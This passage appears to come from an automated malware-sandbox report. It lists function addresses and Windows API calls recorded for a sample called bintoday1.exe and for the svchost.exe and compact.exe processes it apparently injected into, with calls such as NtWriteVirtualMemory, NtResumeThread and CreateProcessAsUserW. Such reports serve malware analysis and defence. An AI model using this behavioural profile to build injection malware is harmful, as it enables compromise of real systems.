Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2FB0 NtResumeThread,LdrInitializeThunk,	7_2_02DD2FB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2F30 NtCreateSection,LdrInitializeThunk,	7_2_02DD2F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_02DD2CA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02DD2C70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2C60 NtCreateKey,LdrInitializeThunk,	7_2_02DD2C60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_02DD2DD0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02DD2DF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_02DD2D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_02DD2D30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD35C0 NtCreateMutant,LdrInitializeThunk,	7_2_02DD35C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD39B0 NtGetContextThread,LdrInitializeThunk,	7_2_02DD39B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2AB0 NtWaitForSingleObject,	7_2_02DD2AB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2B80 NtQueryInformationFile,	7_2_02DD2B80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2EA0 NtAdjustPrivilegesToken,	7_2_02DD2EA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2E30 NtWriteVirtualMemory,	7_2_02DD2E30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2F90 NtProtectVirtualMemory,	7_2_02DD2F90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2FA0 NtQuerySection,	7_2_02DD2FA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2F60 NtCreateProcessEx,	7_2_02DD2F60
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2CC0 NtQueryVirtualMemory,	7_2_02DD2CC0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2CF0 NtOpenProcess,	7_2_02DD2CF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2C00 NtQueryInformationProcess,	7_2_02DD2C00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2DB0 NtEnumerateKey,	7_2_02DD2DB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD2D00 NtSetInformationFile,	7_2_02DD2D00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD3090 NtSetValueKey,	7_2_02DD3090
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD3010 NtOpenDirectoryObject,	7_2_02DD3010
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD3D70 NtOpenThread,	7_2_02DD3D70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD3D10 NtOpenProcessToken,	7_2_02DD3D10
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F9020 NtCreateFile,	7_2_004F9020
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F9190 NtReadFile,	7_2_004F9190
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F9290 NtDeleteFile,	7_2_004F9290
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F9340 NtClose,	7_2_004F9340
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F94A0 NtAllocateVirtualMemory,	7_2_004F94A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADF9AD NtMapViewOfSection,NtMapViewOfSection,	7_2_00ADF9AD
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADFA2B NtMapViewOfSection,	7_2_00ADFA2B

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BFD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00BFD5EB

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BF1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00BF1201

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BFE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00BFE8F6

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C02046	0_2_00C02046
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00B98060	0_2_00B98060
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BF8298	0_2_00BF8298
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BCE4FF	0_2_00BCE4FF
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BC676B	0_2_00BC676B
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C24873	0_2_00C24873
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BBCAA0	0_2_00BBCAA0
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00B9CAF0	0_2_00B9CAF0
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BACC39	0_2_00BACC39
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BC6DD9	0_2_00BC6DD9
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00B991C0	0_2_00B991C0
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BAB119	0_2_00BAB119
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB1394	0_2_00BB1394
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB781B	0_2_00BB781B
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00B97920	0_2_00B97920
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BA997D	0_2_00BA997D
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB7A4A	0_2_00BB7A4A
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB7CA7	0_2_00BB7CA7
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BC9EEE	0_2_00BC9EEE
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C1BE44	0_2_00C1BE44
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_033435D0	0_2_033435D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004888C3	2_2_004888C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004728B0	2_2_004728B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00480133	2_2_00480133
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004721DC	2_2_004721DC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00486A6C	2_2_00486A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00486AAE	2_2_00486AAE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00486AB3	2_2_00486AB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00480353	2_2_00480353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00473330	2_2_00473330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0047E3D3	2_2_0047E3D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004724DD	2_2_004724DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004724E0	2_2_004724E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0049EED3	2_2_0049EED3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031003E6	2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C02C0	2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030100	2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031001AA	2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F81CC	2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064750	2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C6E0	2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03100591	2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4420	2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F2446	2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EE4F6	2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F6BD7	2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310A9A6	2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304A840	2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030268B8	2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E8F0	2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03082F28	2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060F30	2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E2F30	2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40	2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BEFA0	2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032FC8	2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304CFE0	2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEE26	2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040E59	2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052E90	2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FCE93	2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEEDB	2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304AD00	2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DCD1F	2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03058DBF	2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303ADE0	2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040C00	2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0CB5	2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030CF2	2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F132D	2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302D34C	2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0308739A	2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030452A0	2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B2C0	2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E12ED	2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307516C	2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302F172	2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310B16B	2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304B1B0	2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EF0CC	2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030470C0	2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F70E9	2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF0E0	2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF7B0	2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F16CC	2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7571	2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DD5B0	2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF43F	2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03031460	2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFB76	2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FB80	2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B5BF0	2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307DBF9	2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFA49	2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7A46	2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B3A6C	2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DDAAC	2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085AA0	2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E1AA3	2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EDAC6	2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D5910	2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049950	2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B950	2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AD800	2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030438E0	2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFF09	2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03041F92	2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFFB1	2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049EB0	2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03043D40	2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F1D5A	2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7D73	2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FDC0	2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B9C32	2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFCF2	2_2_030FFCF2
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_03334F14	6_2_03334F14
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_03355A6A	6_2_03355A6A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_03334F86	6_2_03334F86
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333D603	6_2_0333D603
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333D645	6_2_0333D645
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333D64A	6_2_0333D64A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_03336EEA	6_2_03336EEA
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333F45A	6_2_0333F45A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_03336CCA	6_2_03336CCA
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E202C0	7_2_02E202C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E40274	7_2_02E40274
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E603E6	7_2_02E603E6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DAE3F0	7_2_02DAE3F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5A352	7_2_02E5A352
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E32000	7_2_02E32000
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E581CC	7_2_02E581CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E541A2	7_2_02E541A2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E601AA	7_2_02E601AA
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E28158	7_2_02E28158
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D90100	7_2_02D90100
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E3A118	7_2_02E3A118
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DBC6E0	7_2_02DBC6E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D9C7C0	7_2_02D9C7C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DC4750	7_2_02DC4750
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA0770	7_2_02DA0770
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E4E4F6	7_2_02E4E4F6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E52446	7_2_02E52446
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E44420	7_2_02E44420
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E60591	7_2_02E60591
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA0535	7_2_02DA0535
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D9EA80	7_2_02D9EA80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E56BD7	7_2_02E56BD7
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5AB40	7_2_02E5AB40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DCE8F0	7_2_02DCE8F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D868B8	7_2_02D868B8
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA2840	7_2_02DA2840
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DAA840	7_2_02DAA840
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E6A9A6	7_2_02E6A9A6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA29A0	7_2_02DA29A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DB6962	7_2_02DB6962
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5EEDB	7_2_02E5EEDB
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DB2E90	7_2_02DB2E90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5CE93	7_2_02E5CE93
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA0E59	7_2_02DA0E59
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5EE26	7_2_02E5EE26
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D92FC8	7_2_02D92FC8
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DACFE0	7_2_02DACFE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E1EFA0	7_2_02E1EFA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E14F40	7_2_02E14F40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E42F30	7_2_02E42F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DC0F30	7_2_02DC0F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DE2F28	7_2_02DE2F28
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D90CF2	7_2_02D90CF2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E40CB5	7_2_02E40CB5
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA0C00	7_2_02DA0C00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D9ADE0	7_2_02D9ADE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DB8DBF	7_2_02DB8DBF
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DAAD00	7_2_02DAAD00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E3CD1F	7_2_02E3CD1F
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E412ED	7_2_02E412ED
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DBB2C0	7_2_02DBB2C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA52A0	7_2_02DA52A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DE739A	7_2_02DE739A
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D8D34C	7_2_02D8D34C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5132D	7_2_02E5132D
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5F0E0	7_2_02E5F0E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E570E9	7_2_02E570E9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA70C0	7_2_02DA70C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E4F0CC	7_2_02E4F0CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DAB1B0	7_2_02DAB1B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E6B16B	7_2_02E6B16B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D8F172	7_2_02D8F172
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DD516C	7_2_02DD516C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E516CC	7_2_02E516CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DE5630	7_2_02DE5630
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5F7B0	7_2_02E5F7B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D91460	7_2_02D91460
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5F43F	7_2_02E5F43F
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E695C3	7_2_02E695C3
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E3D5B0	7_2_02E3D5B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E57571	7_2_02E57571
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E4DAC6	7_2_02E4DAC6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E41AA3	7_2_02E41AA3
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E3DAAC	7_2_02E3DAAC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DE5AA0	7_2_02DE5AA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E13A6C	7_2_02E13A6C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E57A46	7_2_02E57A46
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5FA49	7_2_02E5FA49
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E15BF0	7_2_02E15BF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DDDBF9	7_2_02DDDBF9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DBFB80	7_2_02DBFB80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5FB76	7_2_02E5FB76
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA38E0	7_2_02DA38E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E0D800	7_2_02E0D800
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA9950	7_2_02DA9950
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DBB950	7_2_02DBB950
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E35910	7_2_02E35910
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA9EB0	7_2_02DA9EB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA1F92	7_2_02DA1F92
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5FFB1	7_2_02E5FFB1
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5FF09	7_2_02E5FF09
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E5FCF2	7_2_02E5FCF2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E19C32	7_2_02E19C32
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DBFDC0	7_2_02DBFDC0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E57D73	7_2_02E57D73
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02DA3D40	7_2_02DA3D40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02E51D5A	7_2_02E51D5A
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004E1C80	7_2_004E1C80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004DCB90	7_2_004DCB90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004DCDB0	7_2_004DCDB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004DAE30	7_2_004DAE30
